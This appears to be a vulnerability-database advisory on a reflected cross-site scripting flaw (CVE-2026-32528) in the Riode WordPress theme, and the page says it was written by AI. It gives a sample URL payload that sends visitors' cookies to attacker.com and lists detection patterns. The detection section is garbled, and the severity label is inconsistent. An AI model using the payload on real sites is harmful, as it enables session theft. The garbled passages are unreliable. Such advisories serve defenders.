
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-32528 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Riode Multi-Purpose WooCommerce Theme for WordPress, developed by don-themes. It affects all versions of the Riode theme prior to 1.6.29 and was discovered by Tran Nguyen Bao Khanh of VCI - VNPT Cyber Immunity, reported on January 29, 2026, and published on March 25, 2026. The vulnerability carries a CVSS v3.1 base score of 7.1 (Medium/High) (Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), arising from insufficient sanitization of user-supplied input that is reflected back in the web page response without proper encoding. An unauthenticated remote attacker can craft a malicious URL containing a JavaScript payload that, when visited by an authenticated or otherwise targeted user, causes the browser to execute the injected script in the context of the affected site. No special privileges are required by the attacker, but successful exploitation requires user interaction (e.g., a victim clicking a crafted link) (Patchstack).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser session, potentially leading to session hijacking, credential theft, redirection to malicious sites, or injection of unwanted content such as advertisements. The vulnerability has a changed scope, meaning the impact can extend beyond the vulnerable component to affect other resources within the browser context. Confidentiality, integrity, and availability are each assessed as low impact, but the risk is amplified in mass-exploit campaigns targeting large numbers of WordPress sites (Patchstack).
No public proof-of-concept exploit code or active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.033% (0.000330), indicating a low probability of exploitation in the near term. No threat actor attribution or CISA KEV catalog listing has been identified. However, Patchstack notes that vulnerabilities of this type are commonly used in mass-exploit campaigns targeting WordPress sites at scale, regardless of site popularity (Patchstack).
https://victim-site.com/?vulnerable_param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.<script>, javascript:, onerror=, onload= patterns in query strings); unusual outbound requests from victim browsers to unknown external domains shortly after page load.%3Cscript%3E, %22, %27) in query parameters associated with Riode theme endpoints.The vendor has released version 1.6.29 of the Riode theme, which patches this vulnerability. Site administrators should update to version 1.6.29 or later immediately. As an interim measure, Patchstack has issued a virtual patching/mitigation rule for subscribers that blocks exploitation attempts until the theme is updated. If updating is not immediately possible, restricting access to the affected WordPress site or consulting a hosting provider for assistance is advised (Patchstack).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."